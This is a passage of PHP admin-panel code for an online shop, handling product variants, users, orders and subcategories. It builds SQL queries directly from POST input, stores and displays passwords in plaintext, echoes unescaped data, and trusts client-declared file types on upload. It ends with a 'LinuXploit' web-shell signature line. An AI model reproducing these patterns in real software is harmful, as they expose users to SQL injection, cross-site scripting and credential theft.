		$folder = "product_images/";
		$accept_type = array('image/jpeg', 'image/jpg', 'image/png', 'image/bmp', 'image/gif', 'image/tiff');
		if (in_array($type, $accept_type) !== false) {
			if (!is_dir($folder)) {
				mkdir($folder);
			}
			$image = explode('.', $name1);
			$image_name = MD5(date('r')) . '.' . $image[1];
			$img1 = $folder . $image_name;
			if (move_uploaded_file($_FILES["image"]["tmp_name"], $img1)) {
				$ob->query("insert into v_color SET color='$color', p_id='$p_id', price='$price', image='$img1'");
				if ($ob->affected_rows() >= 1) {
					$source_img = $img1;
					$destination_img = $img1;
					$crop = false;
					compress($source_img, $destination_img, 2000, 2000, $crop);
				}
			}
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "Failed/nTry again.";
			}
		}
	}
	/////Delete Product
	if ($_POST["command"] == "del_color") {
		$id = $_POST["pro_id"];
		$ob->query("SELECT * FROM v_color WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
				$image = $data['image'];
				unlink($image);
			}
		}
		$ob->query("DELETE FROM v_color WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		};
	}
	///////// Show Varient Size
	if ($_POST['command'] == "show_size") {
		$query = "SELECT * FROM size";
		$ob->query($query);

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$id = $data["id"];
				$p_id = $data['p_id'];
				$size = $data['size'];
				$price = $data['price'];

				?>
					<tr>
						<td><?php echo $i; ?></td>
						<td>
							<?php
								$ob->query("SELECT * FROM product WHERE id='$p_id'");
								if ($ob->affected_rows() >= 1) {
									foreach ($ob->rows() as $cat) {
										echo $cat['title'];
									}
								} else {
									echo "No product";
								}
							?>
						</td>						
						<td><?php echo $size; ?></td>
						<td><?php echo $price; ?></td>
						<td>
							<a href="#myuser" id="del_size" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
						</td>
					</tr>
					

				<?php
			}
		}
	}
	
	////////////////////////////// Add Sieze
	if ($_POST['command'] == "do_add_size") {
		$size = $_POST['size'];
		$price = $_POST['price'];
		$p_id = $_POST['p_id'];

		$ob->query("insert into size SET size='$size', p_id='$p_id', price='$price'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "Failed.";
		}
	}
	/////Delete Video
	if ($_POST["command"] == "del_size") {
		$id = $_POST["id"];
		$ob->query("DELETE FROM size WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		};
	}
	
	////SHOW User
	if($_POST['command'] == "show_user"){
		$query = "SELECT * FROM user_detail";
		$ob->query($query);
		if($ob->affected_rows() >= 1){
			$i=0;
			foreach($ob->rows() as $data){
				$i++;
				$name = $data['name'];
				$email = $data['email'];
				$mobile = $data['mobile'];
				$password = $data['password'];		
				$address = $data['address'];
				$pincode = $data['pincode'];
				$status = $data['status'];
				$user_id = $data["id"];
				if($status == 1){
					$msg = "Active";	
				}else{
					$msg = "Inactive";
				}
				echo "
					<tr>
						<td>$i</td>
						<td>$name</td>
						<td>$email</td>
						<td>$mobile</td>
						<td>$password</td>
						<td>$address</td>
						<td>$pincode</td>
						<td>$msg</td>
						<td>
							<a href='#myuser' role='button' class='btn btn-info btn-sm btn-icon icon-left info_button edit_user' data-toggle='modal' data-id='$user_id' data-value='$name'><i class='fa fa-edit'></i> Edit</a>
							<a href='#myuser' role='button' class='btn btn-danger btn-sm btn-icon icon-left danger_button ml-1' id='del_user' value='$user_id'><i class='fa fa-times'></i> Delete</a>
							
						</td>
					</tr>
				";
			}
		}
	}
	////////////////////////////////////////User regist
	if($_POST['command'] == "do_userregist"){
		$name = $_POST['name'];
		$email = $_POST['email'];
		$password = $_POST['password'];
		$mobile = $_POST['mobile'];
		$address = $_POST['address'];
		$pincode = $_POST['pincode'];
		$status = 1;

		$ob->query("SELECT * FROM user_detail WHERE email='$email' AND mobile='$mobile'");
		if($ob->affected_rows() >= 1){
			echo "Email or Mobile Already Exist.";
		}
		else{
			$ob->query("insert into user_detail SET name='$name', password='$password', email='$email', mobile='$mobile',  address='$address', pincode='$pincode', status='$status'");
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "Failed.";
			}
				
		}
	}
	
	/////Delete user
	if($_POST["command"] == "del_user"){
		$id = $_POST["id"];
		$ob->query("DELETE FROM user_detail WHERE id='$id'");
		if($ob->affected_rows() >= 1){
			echo "OK";
		}else{ echo "failed";};
	}

	///////////User Edit
	if($_POST["command"] == "edit_user"){
		$id = $_POST["id"];
		$ob->query("SELECT * FROM user_detail WHERE id='$id'");
		if($ob->affected_rows() >= 1){
			foreach($ob->rows() as $data){
				?>
				<form id="user_edit_form" method="POST" enctype="multipart/form-data">
					<div class="modal-body">
						<div class="form-group">
							<label for="name">Name</label>
							<input type="text" name="name" value="<?php echo $data["name"]; ?>" id="name" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="email">Email</label>
							<input type="email" name="email" value="<?php echo $data["email"]; ?>" id="email" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="mobile">Mobile</label>
							<input type="text" name="mobile" value="<?php echo $data["mobile"]; ?>" id="mobile" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="password">Password</label>
							<input type="password" name="password" value="<?php echo $data["password"]; ?>" id="Password" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="address">Address</label>
							<textarea rows="3" name="address" id="address" class="form-control txt"><?php echo $data["address"]; ?></textarea>
						</div>
						<div class="form-group">
							<label for="pincode">Pincode</label>
							<input type="text" name="pincode" value="<?php echo $data["pincode"]; ?>" id="pincode" class="form-control txt">
						</div>
						<div class="form-group">
							<select class="form-control" name="status" id="status">
								<option value="1" <?php if($data["status"] == 1){echo "selected";} ?>>Active</option>
								<option value="0" <?php if($data["status"] == 0){echo "selected";} ?>>Inactive</option>
							</select>
						</div>
					</div>
					<div class="modal-footer">
						<div class="form-group">
							<input type="submit" name="submit" class="btn btn-success boton" />
							<input type="hidden" name="id" value="<?php echo $id; ?>">
						</div>
						<input type="hidden" name="command" value="do_useredit" />
					</div>
				</form>
				<?php
			}
		}
	}
	if($_POST["command"] == "do_useredit"){

		$name = $_POST["name"];
		$email = $_POST["email"];
		$mobile = $_POST["mobile"];
		$password = $_POST["password"];
		$address = $_POST["address"];
		$pincode = $_POST['pincode'];
		$status = $_POST["status"];
		$id = $_POST["id"];
		
		$ob->query("UPDATE user_detail SET name='$name', password='$password', email='$email', mobile='$mobile', address='$address', pincode='$pincode', status='$status' WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}

	///////////// SHOW PRODUCTS
	if ($_POST['command'] == "show_order") {
		$query = "SELECT * FROM orders ORDER BY `id` DESC";
		$ob->query($query);
		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$id = $data["id"];
				$user_id = $data['user_id'];
				$product_id = $data['product_id'];
				$quantity = $data['quantity'];
				$order_date = $data['order_date'];		
				$payment_method = $data['payment_method'];
				$amount = $data['amount'];

				$status = $data["status"];
				if($status == 0){
					$msg = "Order Received";	
				}else if($status == 1){
					$msg = "Processing";
				}else if($status == 2){
					$msg = "In Shipping";
				}else if($status == 3){
					$msg = "Delivered";
				}else{
					$msg = "Returning";
				}
			?>

				<tr>
					<td><?php echo $i; ?></td>
					<td>
						<?php
						$ob->query("SELECT * FROM user_detail WHERE id='$user_id'");
						if ($ob->affected_rows() >= 1) {
							foreach ($ob->rows() as $cat) {
								echo $cat['name'] ."<br >";
								echo $cat['mobile'];
							}
						} else {
							echo "No name";
						}
						?>
					</td>
					<td>
						<?php
						$ob->query("SELECT * FROM product WHERE id='$product_id'");
						if ($ob->affected_rows() >= 1) {
							foreach ($ob->rows() as $cat) {
								echo $cat['title'];
							}
						} else {
							echo "No title";
						}
						?>
					</td>
					<td>
						<div><?php echo $quantity; ?></div>
					</td>
					<td>
						<div><?php echo $amount; ?></div>
					</td>
					<td>
						<div><?php echo $order_date; ?></div>
					</td>
					<td>
						<div><?php echo $payment_method; ?></div>
					</td>
					<td>
						<div><?php echo $msg; ?></div>
					</td>
					<td>
						<a href='#myuser' role='button' class="btn btn-info btn-sm btn-icon icon-left info_button edit_order" data-toggle="modal" data-target="#myuser" data-id='<?php echo $id; ?>'>
							<i class="fas fa-edit"></i> Edit
						</a>
					</td>
				</tr>
			<?php

			}
		}
	}

	if($_POST["command"] == "edit_order"){
		$id = $_POST["id"];
		$ob->query("SELECT * FROM orders WHERE id='$id'");
		if($ob->affected_rows() >= 1){
			foreach($ob->rows() as $data){
				?>
				<form id="order_edit_form">
					<div class="modal-body">
						<div class="form-group">
							<select class="form-control" name="status" id="status">
								<option value="0" <?php if($data["status"] == 0){echo "selected";} ?>>Order Received</option>
								<option value="1" <?php if($data["status"] == 1){echo "selected";} ?>>Processing</option>
								<option value="2" <?php if($data["status"] == 2){echo "selected";} ?>>In Shipping</option>
								<option value="3" <?php if($data["status"] == 3){echo "selected";} ?>>Delivered</option>
								<option value="4" <?php if($data["status"] == 4){echo "selected";} ?>>Returning</option>
							</select>
						</div>
					</div>
						<div class="modal-footer">
							<div class="form-group">
								<input type="submit" name="submit" class="btn btn-success boton" />
								<input type="reset" name="reset" class="btn btn-danger boton">
								<input type="hidden" name="id" value="<?php echo $id; ?>">
							</div>
							<input type="hidden" name="command" value="do_edit_order" />
						</div>
					</div>
				</form>
				<?php
			}
		}
	}
	
	if($_POST["command"] == "do_edit_order"){
		$status = $_POST["status"];
		$id = $_POST["id"];
		$ob->query("UPDATE orders SET status='$status' WHERE id='$id'");
		if($ob->affected_rows() >= 1){
			echo "OK";
		}else{
			echo "failed";
		}
	}

	
	///////////// SHOW PRODUCTS
	if ($_POST['command'] == "show_sub_cat") {
		$query = "SELECT * FROM sub_category ORDER BY `id` DESC";
		$ob->query($query);
		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				$id = $data['id'];
				$cat_id = $data['cat_id'];
				$title = $data['title'];
				$image = $data['image'];
			?>

				<tr>
					<td><?php echo $i; ?></td>
					<td>
						<?php
						$ob->query("SELECT * FROM category WHERE id='$cat_id'");
						if ($ob->affected_rows() >= 1) {
							foreach ($ob->rows() as $cat) {
								echo $cat['category'];
							}
						} else {
							echo "No category";
						}
						?>
					</td>
					<td><?php echo $title; ?></td>
					<td style="text-align:center;">
						<a href="#" data-toggle="modal" data-target="#myModal_img<?php echo $id; ?>"><img src='<?php echo $image; ?>' style='max-width:100px;max-height:100px;' /></a>
					</td>
					<td>
						<!-- <a href='#myuser' role='button' class="btn btn-info btn-sm btn-icon icon-left info_button edit_sub_cat" data-toggle="modal" data-target="#myuser" data-id='<?php echo $id; ?>' data-value='<?php echo $title; ?>'>
							<i class="fas fa-edit"></i> Edit
						</a> -->
						<a href="#myuser" id="del_sub_cat" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
					</td>
				</tr>
			<?php

			}
		}
	}
	
	////////////////////////////// Add Product
	if ($_POST['command'] == "do_add_sub_cat") {

		$title = $_POST['title'];
		$cat_id = $_POST['cat_id'];

		$name1 = $_FILES['image']['name'];
		$tmp = $_FILES['image']['tmp_name'];
		$type = $_FILES['image']['type'];
		$folder = "product_images/";
		$accept_type = array('image/jpeg', 'image/jpg', 'image/png', 'image/bmp', 'image/gif', 'image/tiff');
		if (in_array($type, $accept_type) !== false) {
			if (!is_dir($folder)) {
				mkdir($folder);
			}
			$image = explode('.', $name1);
			$image_name = MD5(date('r')) . '.' . $image[1];
			$img1 = $folder . $image_name;
			if (move_uploaded_file($_FILES["image"]["tmp_name"], $img1)) {
				$ob->query("insert into sub_category SET title='$title', cat_id='$cat_id', image='$img1'");
				if ($ob->affected_rows() >= 1) {
					$source_img = $img1;
					$destination_img = $img1;
					$crop = false;
					compress($source_img, $destination_img, 2000, 2000, $crop);
				}
			}
			if ($ob->affected_rows() >= 1) {
				echo "OK";
			} else {
				echo "Failed/nTry again.";
			}
		}
	}

	/////Delete Product
	if ($_POST["command"] == "del_sub_cat") {
		$id = $_POST["pro_id"];
		$ob->query("SELECT * FROM sub_category WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
				$image = $data['image'];
				unlink($image);
			}
		}
		$ob->query("DELETE FROM sub_category WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		};
	}

}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit